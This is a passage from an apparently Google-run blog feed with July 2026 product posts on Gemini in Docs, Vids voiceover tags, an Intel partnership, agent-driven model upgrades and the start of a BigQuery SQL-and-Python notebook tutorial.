them.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Match writing style&lt;/b&gt; helps maintain a consistent tone and style across your entire doc, no matter how many people are working on it.&lt;/li&gt;&lt;li&gt;With &lt;b&gt;Match doc format&lt;/b&gt;, Gemini can mirror a source document to generate content that adheres to the original's formatting (e.g., fonts and colors) and structural elements (e.g., headings and table columns).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;To generate new docs from scratch, open a new doc, enter your prompt, and click submit. To edit existing docs, simply hover over the spark near the bottom of your doc and type a prompt in the bottom bar.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQuqyJ5HJ2N_jJGRs5gveCwyqfqPs8I4ZoFquOOTlWtfJiommNtp8M77HxY8YjoYaKNfQBx2K8ioupbYe87AuI8hjmtfyIoFkQ7f_UG7QDgb-Xhoql3OcG9BczGlQ8fZJRCTOUbXc_Ahyx-d5TzVIYCaWZSKiQfG28LhD_NsJhCHOc-wuAy7BJFeDTgAE/s1200/Expanded%20language%20support%20for%20Gemini%20in%20Google%20Docs%20-%207142.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQuqyJ5HJ2N_jJGRs5gveCwyqfqPs8I4ZoFquOOTlWtfJiommNtp8M77HxY8YjoYaKNfQBx2K8ioupbYe87AuI8hjmtfyIoFkQ7f_UG7QDgb-Xhoql3OcG9BczGlQ8fZJRCTOUbXc_Ahyx-d5TzVIYCaWZSKiQfG28LhD_NsJhCHOc-wuAy7BJFeDTgAE/s1600/Expanded%20language%20support%20for%20Gemini%20in%20Google%20Docs%20-%207142.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;These features are available by default if &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Drive is enabled&lt;/a&gt;. Note that enabling &lt;a href="https://knowledge.workspace.google.com/p/wsi" target="_blank"&gt;Workspace Intelligence&lt;/a&gt; expands the range of supported use cases.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features&lt;/a&gt; enabled to use these features. Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/15541879" target="_blank"&gt;learn more about creating personalized documents with Gemini in Google Docs&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 15, 2026&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on August 1, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons:&lt;/b&gt; Teaching and Learning&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*; Google AI Pro for Education*&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;*Users with AI Expanded Access and Google AI Pro for Education add-on licenses will have &lt;a href="https://support.google.com/a?p=limits" target="_blank"&gt;higher limits on usage&lt;/a&gt; of Match writing style and Match document format tools.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/13447609" target="_blank"&gt;Write &amp;amp; edit with Gemini in Docs&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/14615114?hl=en" target="_blank"&gt;Learn how Gemini in Gmail, Calendar, Chat, Docs, Drive, Sheets, Slides, Meet &amp;amp; Vids protects your data&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/expanded-language-support-for-gemini-in-Google-Docs.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-16T16:46:22+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQuqyJ5HJ2N_jJGRs5gveCwyqfqPs8I4ZoFquOOTlWtfJiommNtp8M77HxY8YjoYaKNfQBx2K8ioupbYe87AuI8hjmtfyIoFkQ7f_UG7QDgb-Xhoql3OcG9BczGlQ8fZJRCTOUbXc_Ahyx-d5TzVIYCaWZSKiQfG28LhD_NsJhCHOc-wuAy7BJFeDTgAE/s72-c/Expanded%20language%20support%20for%20Gemini%20in%20Google%20Docs%20-%207142.gif" type="image/gif" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQuqyJ5HJ2N_jJGRs5gveCwyqfqPs8I4ZoFquOOTlWtfJiommNtp8M77HxY8YjoYaKNfQBx2K8ioupbYe87AuI8hjmtfyIoFkQ7f_UG7QDgb-Xhoql3OcG9BczGlQ8fZJRCTOUbXc_Ahyx-d5TzVIYCaWZSKiQfG28LhD_NsJhCHOc-wuAy7BJFeDTgAE/s72-c/Expanded%20language%20support%20for%20Gemini%20in%20Google%20Docs%20-%207142.gif"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQuqyJ5HJ2N_jJGRs5gveCwyqfqPs8I4ZoFquOOTlWtfJiommNtp8M77HxY8YjoYaKNfQBx2K8ioupbYe87AuI8hjmtfyIoFkQ7f_UG7QDgb-Xhoql3OcG9BczGlQ8fZJRCTOUbXc_Ahyx-d5TzVIYCaWZSKiQfG28LhD_NsJhCHOc-wuAy7BJFeDTgAE/s72-c/Expanded%20language%20support%20for%20Gemini%20in%20Google%20Docs%20-%207142.gif" type="image/gif" length="0"/>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/easily-steer-ai-voiceover-and-avatar-speaking-with-emotions-pacing-and-sound-effects.html</id>
    <title>Easily control the emotions and pacing of AI avatars and AI voiceovers in Google Vids</title>
    <updated>2026-07-16T16:30:25+00:00</updated>
    <content type="html">Users can now easily steer voiceover and avatar speaking in &lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt; by typing content within brackets like “[excitedly]”.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;When typing open brackets (“[“) Vids will offer a menu of steering tags to customize pacing, emotional delivery, and sound effects. These cues empower you to guide the voiceover or avatar’s response to specific moments within your script.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;If you’re short on time, just click "Apply audio tags" for Vids to automatically populate your script with tags based on the content.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb6ZoZK5hDFubeT59V5mHN_0XXCo5-EabpxgzaIDN3mYufd8k9jTVrlE3KkaXWnhTcWukuqdn9vVzB1P6uhQa0Gb4wvOG5AiMHLOwgAEHU5tTDgLz6T9KEkLoqTxuEV8wtnlfJA6PibYXiEVlLTkzaoN9BDajfJ6LW9NQJR6igJz3uKFPE-Q-F-8hUKjQ/s2048/Easily%20steer%20AI%20voiceover%20and%20avatar%20speaking%20with%20emotions,%20pacing,%20and%20sound%20effects%20-%206835.gif" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb6ZoZK5hDFubeT59V5mHN_0XXCo5-EabpxgzaIDN3mYufd8k9jTVrlE3KkaXWnhTcWukuqdn9vVzB1P6uhQa0Gb4wvOG5AiMHLOwgAEHU5tTDgLz6T9KEkLoqTxuEV8wtnlfJA6PibYXiEVlLTkzaoN9BDajfJ6LW9NQJR6igJz3uKFPE-Q-F-8hUKjQ/w250-h640/Easily%20steer%20AI%20voiceover%20and%20avatar%20speaking%20with%20emotions,%20pacing,%20and%20sound%20effects%20-%206835.gif" width="250" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;&lt;br /&gt;Steering suggestions in Vids scripts&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; Visit the Help Center to learn more about &lt;a href="https://support.google.com/docs/answer/15070345?hl=en" target="_blank"&gt;creating voiceovers with AI&lt;/a&gt; and &lt;a href="https://support.google.com/docs/answer/16334946" target="_blank"&gt;using AI avatars&lt;/a&gt; in Google Vids.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Full rollout (1–3 days for feature visibility) started on July 15, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business:&lt;/b&gt; Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise:&lt;/b&gt; Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer:&lt;/b&gt; All users with personal Google accounts, including Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Enterprise Essentials, and Enterprise Essentials Plus; Nonprofits; Individual&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons:&lt;/b&gt; Teaching and Learning; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;*Users with AI Expanded Access add-on licenses have &lt;a href="https://support.google.com/a/answer/14700766" target="_blank"&gt;higher limits&lt;/a&gt; on usage of AI features in Vids.&amp;nbsp;&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16334946" target="_blank"&gt;Use AI avatars in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/15070345" target="_blank"&gt;Create voiceovers with AI in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/easily-steer-ai-voiceover-and-avatar-speaking-with-emotions-pacing-and-sound-effects.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-16T16:30:25+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb6ZoZK5hDFubeT59V5mHN_0XXCo5-EabpxgzaIDN3mYufd8k9jTVrlE3KkaXWnhTcWukuqdn9vVzB1P6uhQa0Gb4wvOG5AiMHLOwgAEHU5tTDgLz6T9KEkLoqTxuEV8wtnlfJA6PibYXiEVlLTkzaoN9BDajfJ6LW9NQJR6igJz3uKFPE-Q-F-8hUKjQ/s72-w250-h640-c/Easily%20steer%20AI%20voiceover%20and%20avatar%20speaking%20with%20emotions,%20pacing,%20and%20sound%20effects%20-%206835.gif" type="image/gif" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb6ZoZK5hDFubeT59V5mHN_0XXCo5-EabpxgzaIDN3mYufd8k9jTVrlE3KkaXWnhTcWukuqdn9vVzB1P6uhQa0Gb4wvOG5AiMHLOwgAEHU5tTDgLz6T9KEkLoqTxuEV8wtnlfJA6PibYXiEVlLTkzaoN9BDajfJ6LW9NQJR6igJz3uKFPE-Q-F-8hUKjQ/s72-w250-h640-c/Easily%20steer%20AI%20voiceover%20and%20avatar%20speaking%20with%20emotions,%20pacing,%20and%20sound%20effects%20-%206835.gif"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb6ZoZK5hDFubeT59V5mHN_0XXCo5-EabpxgzaIDN3mYufd8k9jTVrlE3KkaXWnhTcWukuqdn9vVzB1P6uhQa0Gb4wvOG5AiMHLOwgAEHU5tTDgLz6T9KEkLoqTxuEV8wtnlfJA6PibYXiEVlLTkzaoN9BDajfJ6LW9NQJR6igJz3uKFPE-Q-F-8hUKjQ/s72-w250-h640-c/Easily%20steer%20AI%20voiceover%20and%20avatar%20speaking%20with%20emotions,%20pacing,%20and%20sound%20effects%20-%206835.gif" type="image/gif" length="0"/>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-07-16-Intel-and-Google-Cloud-Announce-Collaboration-to-Accelerate-Intels-AI-Enabled-Enterprise-Transformation</id>
    <title>Intel and Google Cloud Announce Collaboration to Accelerate Intel’s AI-Enabled Enterprise Transformation</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">Collaboration leverages Gemini Enterprise and Google Cloud to expand Intel’s AI workforce capabilities via scalable agentic workflows across core business functions</content>
    <link href="https://googlecloudpresscorner.com/2026-07-16-Intel-and-Google-Cloud-Announce-Collaboration-to-Accelerate-Intels-AI-Enabled-Enterprise-Transformation" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-07-16T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/compute/lessons-in-accelerating-foundation-model-upgrades</id>
    <title>Three lessons in accelerating foundation model upgrades</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Have you run into problems migrating your products from one model to the next?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upgrading to the latest AI models is rarely simple. For engineering teams, model updates whether migrating to an entirely new model or updating to a newer checkpoint within the same model family, like moving from an earlier Gemini version to Gemini 3.5 — often require a slow and costly process of testing, proving quality, and manually evaluating new responses. For most engineering teams, upgrading to a new model checkpoint means months of manual toil to verify performance. And the industry is moving at breakneck pace – since 2023, we’ve announced six major model evolutions, bringing us to Gemini 3.5 today. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our team at Google Cloud, Applied ML, has a goal to &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;deliver transformative infrastructure and services that benefit both Google and our customers globally. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;As part of that, our team built an agentic workflow that completes model upgrades in hours instead of months. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we’ll show you our approach and three lessons you can apply to accelerate your own foundation model upgrades using &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— our new, comprehensive platform to build, scale, govern, and optimize agents – and &lt;/span&gt;&lt;a href="https://antigravity.google/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, our primary solution for developers using AI for coding and agent orchestration.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Three lessons in building a flexible agent system&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To support different team needs, we had to rethink traditional automation and learned three key lessons along the way: &lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Lesson 1: Start with hands-on discovery. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;First, our engineers worked closely with product teams on real migration problems. This hands-on work helped us identify complex requirements and build our first guidelines for prompt optimization.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Lesson 2: Beware the rigidity of traditional automation. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We turned these guidelines into a standard, automated workflow. While this version gave us some quick wins, we soon found that traditional automation was too rigid to handle different data formats and unique edge cases.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Lesson 3: Pivot to a flexible agent architecture. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The real progress came when we rebuilt the tool using a flexible agent. Instead of forcing teams into a rigid process, the agent adapted to specific project needs, helping analyze data and test prompts dynamically with a high degree of adaptability.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How our partner teams cut migration time while boosting quality&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our partner team, which manages video translation and dubbing services, had an interesting challenge: their workflow required rewriting translated text so that the spoken duration matched the original video's pacing exactly, without altering the meaning. Historically, this strict constraint required maintaining a fine-tuned model. Their goal was to migrate to the latest out-of-the-box foundation model, guided purely by prompt engineering.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Using this agentic framework, the team provided their ground-truth dataset and baseline prompt. The system autonomously hill-climbed the prompt quality, migrating the service away from the custom stack&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Make your own migration workflow with Agent Platform and Google Antigravity&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These learnings can be applied by any engineering team looking to accelerate their own model upgrades. If your organization is struggling to keep pace with new foundational models, replacing manual toil with intelligent automation requires treating migration as an agentic workflow.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To build your own automated migration pipeline, follow these steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deploy Autoraters:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Pivot from manual human review to model-based Autoraters to evaluate the quality of a new checkpoint at scale and in a fraction of the time.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Build an agentic loop:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can use the Agent Development Kit within Gemini Enterprise Agent Platform to create your agent. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Automate the orchestration:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To make the process even easier, leverage &lt;/span&gt;&lt;a href="https://antigravity.google/docs/enterprise" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to automate the underlying coding and agent orchestration and add in features such as loss reporting or headroom reports. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By shifting away from a manual, line-by-line engineering task, organizations can reduce infrastructural tech debt and confidently keep pace with the frontier of AI.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sub&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;This work is the result of collaboration across Google. We thank key contributors: Anthony Green, Chris Lamb, Chungyen Li, Connie Huang, Elaine Han, Elena Erbiceanu Tener, Eugene Ie, Francesca Ciacchella, Igor Karpov, Jeanie Jung, Jose Menendez, Kiam Choo, Lina Sanders-Self, Longfei Shen, Martin Nikoltchev, Mason Ng, Matt Mancini, Paul Zhou, Pedram Oskouie, Samuel Smith, Tom Lawrie, Ye Tian, Zhen Lin&lt;/span&gt;&lt;/sub&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/compute/lessons-in-accelerating-foundation-model-upgrades" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-16T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/bridge-sql-and-python-with-bigquery</id>
    <title>Bridging the gap between SQL and Python with BigQuery and the %%bqsql magic</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data scientists and data engineers often find themselves caught between two worlds: SQL and Python. Some find SQL more intuitive, especially when combined with a powerful engine like BigQuery to process data at scale. Others find it easier to work in Python with its rich ecosystem of libraries and runtimes. Historically, using these languages together in one notebook required moving data from SQL results to in-memory and writing from Python memory to temporary tables for SQL to access.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;To solve this friction, the Google Cloud team introduced &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/colab/docs/sql-cells"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;SQL cells in Colab Enterprise&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;. Now, we are expanding that seamless experience to the broader open-source ecosystem. With the &lt;/strong&gt;&lt;a href="https://dataframes.bigquery.dev/notebooks/getting_started/magics.html" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;%%bqsql IPython cell magic&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;, you can now effortlessly chain data processing workloads across SQL and Python code cells.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Thanks to open-source packages like Jupyter, pandas, BigFrames, and the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/sandbox"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery sandbox&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, you can follow all steps in this guide for free* and without a credit card.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;*See the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/sandbox"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;BigQuery sandbox&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; documentation for limitations.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Setting up your environment&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To get started,&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. Enable the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/sandbox"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery sandbox&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Make note of your Google Cloud project ID.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. Set up a local Python development environment, or alternatively, open &lt;/span&gt;&lt;a href="https://colab.research.google.com/github/googleapis/google-cloud-python/blob/main/packages/bigframes/notebooks/dataframes/magics_with_local_data.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;this notebook in Colab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which has a Python environment already installed. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To set up a local python environment, see the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/python/docs/setup"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;steps on Google Cloud Documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Continue with the following steps, if you choose to set up a local python environment, else jump to the &lt;/span&gt;&lt;a href="https://docs.google.com/document/d/13rEVYkdOTbLqA2r1wPDqwn_Be7asayJ3KbfeQM7RwbE/edit?tab=t.0#bookmark=id.jwzed5sln471" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;next section&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. Activate the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;venv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; you created in the previous step to isolate Python dependencies.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On Linux or macOS, use these commands (update to your preferred Python version):&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;. ./env/bin/activate&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bde0d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;4. &lt;span style="vertical-align: baseline;"&gt;Install the Jupyter, bigframes, and python-calamine packages.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;pip install --upgrade jupyterlab bigframes python-calamine&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9bded00&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;5. Start Jupyter Lab.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
